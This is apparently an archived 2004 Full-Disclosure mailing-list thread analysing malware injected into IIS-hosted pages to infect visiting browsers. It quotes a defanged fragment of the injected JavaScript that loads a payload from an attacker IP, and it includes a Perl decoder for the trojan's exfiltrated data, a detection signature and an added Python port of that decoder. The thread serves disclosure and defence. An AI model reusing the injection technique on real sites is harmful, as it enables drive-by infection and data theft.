Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
From: insecure [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Date: Fri, 25 Jun 2004 12:36:41 -0500

... Berbew/Webber/Padodor Trojan, according to Lurhq. http://www.lurhq.com/berbew.html

This web page mentions:

content:id=crutop|26|vvpupkin0=

The upload is in an encoded format that consists of records that specify a machine name, a user name, and a web site that includes an HTML form. For example, if the machine name were BINDVIEW-LAB-17, the user name were labuser, and the form were on http://www.example.com/, then the uploaded data would be sent via HTTP POST, and consist of:

id=crutop&vvpupkin0=asadaeafbeabanbzceclcbbncecabmdocjbwbzdocmcs&vvpupkin1=asadaeafbeabanbdaqataeacauad&vvpupkin2=asadaeafbeabanazafafabcxdqdqagagagdrauajaqbcabbdaudrasbebcdqddcdckbjcibucn

The POST data is sent to one of the web sites specified in http://tms.symantec.com/documents/040624-Alert-CompromisedIISServerReports.pdf

The data can be decoded with the following perl script:

#!/usr/bin/perl
use bytes;
# Read one POST body from stdin; fields are separated by '&'.
$line = <STDIN>;
chomp($line);
@r = split /&/, $line;
for ($i = 0; $i <= $#r; ++$i) {
    # Only the vvpupkinN fields carry encoded records.
    next if ($r[$i] !~ /^vvpupkin/);
    @p = split /=/, $r[$i];
    # Each pair of lowercase letters is a base-26 number (a=0 .. z=25);
    # XORing it with 113 yields one plaintext byte.
    for ($j = 0; $j < length($p[1]) / 2; ++$j) {
        $c1 = substr($p[1], 2 * $j, 1);
        $c2 = substr($p[1], (2 * $j) + 1, 1);
        $o1 = ord($c1) - ord("a");
        $o2 = ord($c2) - ord("a");
        print chr(((26 * $o1) + $o2) ^ 113);
    }
    print "\n";
}

The output of the perl script is:

crutop|BINDVIEW-LAB-17
crutop|labuser
crutop|http://www.example.com/ FORM_0

Matt Power
BindView Corporation, RAZOR Team
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
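A Python port of the decoder, added here as an example and not part of the original message: it parses a whole POST body (the '&'-separated form that the content match quoted above keys on), decodes every vvpupkin field, and rejects malformed fields instead of silently printing garbage. The sample body is the one quoted above, reconstructed with '&' separators; the function names are this example's own.

```python
"""Decoder for the Berbew/Padodor upload format (added example)."""
from urllib.parse import parse_qsl

KEY = 113  # XOR constant used by the Perl script in the message

# Constructed sample: the POST body quoted in the message above,
# with the '&' field separators restored.
SAMPLE_POST = (
    "id=crutop"
    "&vvpupkin0=asadaeafbeabanbzceclcbbncecabmdocjbwbzdocmcs"
    "&vvpupkin1=asadaeafbeabanbdaqataeacauad"
    "&vvpupkin2=asadaeafbeabanazafafabcxdqdqagagagdrauajaqbcabbdaudrasbebcdqddcdckbjcibucn"
)


def decode_field(enc: str) -> str:
    """Decode one vvpupkinN value.

    Each pair of lowercase letters is a base-26 number (a=0 .. z=25);
    XORing that number with 113 gives one plaintext byte.  Anything that
    is not an even-length run of a-z cannot be a valid record.
    """
    if len(enc) % 2 or not all("a" <= c <= "z" for c in enc):
        raise ValueError("malformed vvpupkin field: %r" % enc)
    out = bytearray()
    for hi, lo in zip(enc[0::2], enc[1::2]):
        out.append((26 * (ord(hi) - ord("a")) + (ord(lo) - ord("a"))) ^ KEY)
    return out.decode("latin-1")


def decode_upload(body: str) -> dict:
    """Parse a full POST body; decode vvpupkin* fields, keep the rest as-is."""
    result = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        result[name] = decode_field(value) if name.startswith("vvpupkin") else value
    return result


def matches_signature(body: str) -> bool:
    """Same byte pattern the Snort content match above looks for."""
    return "id=crutop&vvpupkin0=" in body


if __name__ == "__main__":
    for name, value in decode_upload(SAMPLE_POST).items():
        print(name, "=", value)
```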
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Just a reminder. This isn't the first time this has happened:

http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675

--
Gary Flynn
Security Engineer
James Madison University
RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients
For the IIS side

http://www.microsoft.com/security/incident/download_ject.mspx

Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows.

Important: Customers who have deployed Windows XP Service Pack 2 RC2 are not at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS that have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to attempt to infect users of Internet Explorer with malicious code.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to clients

Hi all,

This is a heads up. A new malware has been reported from several sources, so it appears to be fairly widespread already. The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers were compromised in the first place is unfortunately still unknown (any info on that would be appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (e.g. .html, .txt, .gif).

The webpage loads http:// 217.107.218.147/xxx.html that contains the following code:

script language=Javascript
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, dialog Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width :1\;).location= java script:'SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\' \ /script';
[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop msits.exe (51.712 bytes), a trojan-downloader, and run it.

Consider denying access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS: http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
With the current (in)security of most (if not all) ISPs that provide ASP.Net or ASP Classic shared hosting services, all the attackers need to do is to get a hosting account on a shared hosting server (trivial) and infect these websites from the inside.

I haven't heard of any new IIS exploit (which doesn't mean that they don't exist), but compromising the IIS box from the inside (as seen in the Interland story) is probably how this happened.

BTW, do you know which ISP hosts the 'compromised' websites?

Dinis Cruz
.Net Security Consultant
DDPlus

On Fri, 25 Jun 2004 09:20:34 -0400, Gary Flynn wrote:

> Just a reminder. This isn't the first time this has happened:
> http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675
>
> --
> Gary Flynn
> Security Engineer
> James Madison University
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
This is impossible. Microsoft products are inherently secure. We have a patched IIS as stated by the alert, an alpha security patch for the operating system and open holes in the browser. No doubt this is a vicious anti-Microsoft attempt to discredit their security commitments by people who are jealous of Bill Gates' wealth. That or maybe by disgruntled individuals who failed to earn their MVP status.

> For the IIS side
> http://www.microsoft.com/security/incident/download_ject.mspx
> [...]
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Berbew/Webber/Padodor Trojan, according to Lurhq.

http://www.lurhq.com/berbew.html

joe wrote:

> For the IIS side
> http://www.microsoft.com/security/incident/download_ject.mspx
> [...]
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients
Peter Kruse [EMAIL PROTECTED] wrote:

> This is a heads up.

Or... PANIC, PANIC, PANIC...

> A new malware has been reported from several sources so it appears to be fairly widespread already. The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers were compromised in the first place is unfortunately still unknown (any info on that would be appreciated).

There is _no_ evidence (yet) that this is spreading from infected IIS servers. _Some_ IIS admins whose servers are involved don't know how the content got on their servers, but that is far from grounds for claiming said servers are, or even may be, infected. Of course they might be, but history suggests that slack admin'ing is at least as likely as an explanation...

> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (e.g. .html, .txt, .gif).
>
> The webpage loads http:// 217.107.218.147/xxx.html that contains the following code:
>
> script language=Javascript
> function InjectedDuringRedirection(){
> showModalDialog('md.htm', window, dialog Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width :1\;).location= java script:'SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\' \ /script';
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in the following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop msits.exe (51.712 bytes), a trojan-downloader, and run it.

It does this via the now very old ms-its: protocol zone-handling bug...

Apparently someone needs to decode a few more levels of JavaScript, etc. to work this all out...

> Consider denying access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected.

Thanks Peter, but what about all the _other_ servers out there also hosting more or less exactly the same files? Are you going to provide a list of all those IPs too? I've seen several (probably 5 or 6 others) in the last week or so with all the same files or just one difference (ignoring the trivial script differences necessitated by referring to different hosts) -- the .EXE that is eventually downloaded is a different variant.

> Further information can be found in the daily log from SANS: http://isc.sans.org/

Woohoo -- SANS incident handlers have reported one incident of this they know about, so the sky must be falling! Next...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854